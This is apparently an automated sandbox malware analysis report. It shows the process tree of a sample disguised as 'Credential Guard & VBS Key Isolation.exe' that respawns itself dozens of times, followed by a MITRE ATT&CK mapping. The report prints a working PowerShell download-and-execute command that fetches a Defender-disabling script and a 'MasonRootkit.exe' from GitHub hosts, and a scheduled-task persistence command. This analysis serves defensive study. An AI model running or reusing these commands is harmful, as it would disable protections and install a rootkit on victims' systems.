        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        67⤵
        
        PID:7304
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        66⤵
        
        PID:6420
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        65⤵
        
        PID:5836
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        64⤵
        
        PID:3328
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        63⤵
        Executes dropped EXE
        
        PID:644
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        62⤵
        Executes dropped EXE
        
        PID:2000
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        61⤵
        Executes dropped EXE
        
        PID:3500
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        60⤵
        Executes dropped EXE
        
        PID:6768
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        59⤵
        Executes dropped EXE
        
        PID:6364
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        58⤵
        Executes dropped EXE
        
        PID:6824
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        57⤵
        Executes dropped EXE
        
        PID:5364
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        56⤵
        Executes dropped EXE
        
        PID:5628
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        55⤵
        Executes dropped EXE
        
        PID:1616
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        54⤵
        Executes dropped EXE
        
        PID:1748
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        53⤵
        Executes dropped EXE
        
        PID:6096
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        52⤵
        Executes dropped EXE
        
        PID:5548
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        51⤵
        Executes dropped EXE
        
        PID:1548
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        50⤵
        Executes dropped EXE
        
        PID:2580
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        49⤵
        Executes dropped EXE
        
        PID:3248
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        48⤵
        Executes dropped EXE
        
        PID:2352
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        47⤵
        Executes dropped EXE
        
        PID:2368
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        46⤵
        Executes dropped EXE
        
        PID:1172
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        45⤵
        Executes dropped EXE
        
        PID:8008
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        44⤵
        Executes dropped EXE
        
        PID:5132
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        43⤵
        Executes dropped EXE
        
        PID:7712
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        42⤵
        Executes dropped EXE
        
        PID:7456
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        41⤵
        Executes dropped EXE
        
        PID:8180
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        40⤵
        Executes dropped EXE
        
        PID:7880
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        39⤵
        Executes dropped EXE
        
        PID:7656
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        38⤵
        Executes dropped EXE
        
        PID:7384
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        37⤵
        Executes dropped EXE
        
        PID:7200
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        36⤵
        Executes dropped EXE
        
        PID:6636
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        35⤵
        Executes dropped EXE
        
        PID:6400
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        34⤵
        Executes dropped EXE
        
        PID:6256
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        33⤵
        Executes dropped EXE
        
        PID:6164
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        32⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:6780
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        31⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:6844
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        30⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5956
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        29⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:6152
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        28⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:6968
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        27⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:6692
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        26⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:6396
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        25⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:6080
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        24⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5372
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        23⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5844
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        22⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:6020
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        21⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3488
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        20⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:6136
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        19⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5932
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        18⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5580
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        17⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5316
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        16⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2584
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        15⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3720
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        14⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2292
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4580
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1316
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2820
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3620
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1004
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3100
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1504
      - C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4420
    - - C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1724
  - - C:\Windows\Credential Guard & VBS Key Isolation.exe
      "C:\Windows\Credential Guard & VBS Key Isolation.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1616
- - C:\Windows\Credential Guard & VBS Key Isolation.exe
    "C:\Windows\Credential Guard & VBS Key Isolation.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1088
    - - C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe"
        5⤵
        Executes dropped EXE
        
        PID:5472
      - C:\ProgramData\MasonRootkit.exe
        
        "C:\ProgramData\MasonRootkit.exe"
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5556
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF9C1.tmp.bat""
        6⤵
        
        PID:5960
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:6388
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Credential Guard & VBS Key Isolation" /tr "C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5784
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:6256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3580

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3768

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3924

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3372

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4536

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3468

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4376

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3660

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4888

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:5440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:5340

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery